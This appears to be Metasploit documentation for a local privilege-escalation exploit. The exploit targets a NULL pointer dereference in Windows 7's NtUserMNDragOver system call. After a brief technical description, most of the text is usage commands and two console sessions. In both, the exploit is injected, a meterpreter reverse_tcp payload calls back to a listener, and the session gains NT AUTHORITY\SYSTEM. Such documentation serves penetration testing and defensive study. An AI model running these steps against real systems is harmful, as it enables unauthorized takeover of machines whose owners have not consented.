documentation/modules/exploit/windows/local/ntusermndragover.md
This module exploits a NULL pointer dereference vulnerability in MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.
The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint() function does not effectively check the validity of the tagPOPUPMENU objects it processes before passing them on to MNGetpItemFromIndex(), where the NULL pointer dereference will occur.
This module has been tested against Windows 7 x86 SP0 and SP1. Offsets within the solution may need to be adjusted to work with other versions of Windows, such as Windows Server 2008.
use exploit/windows/local/ntusermndragoverset session <session>set payload windows/meterpreter/reverse_tcpset LHOST <LHOST>set LPORT 5555exploitmsf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.15:49158 (192.168.56.15)
msf exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf exploit(windows/local/ntusermndragover) > run
[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[+] Reflectively injecting the exploit DLL and running the exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 192.168.56.15
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.15:49159) at 2020-04-29 17:14:46 +0800
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.5:49157 (192.168.56.5)
msf exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf exploit(windows/local/ntusermndragover) > run
[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 2696 launched.
[*] Injecting exploit into 2696 ...
[*] Exploit injected. Injecting payload into 2696...
[*] Payload injected. Executing exploit...
[*] Sending stage (176195 bytes) to 192.168.56.5
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.5:49158) at 2020-04-29 17:18:00 +0800
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >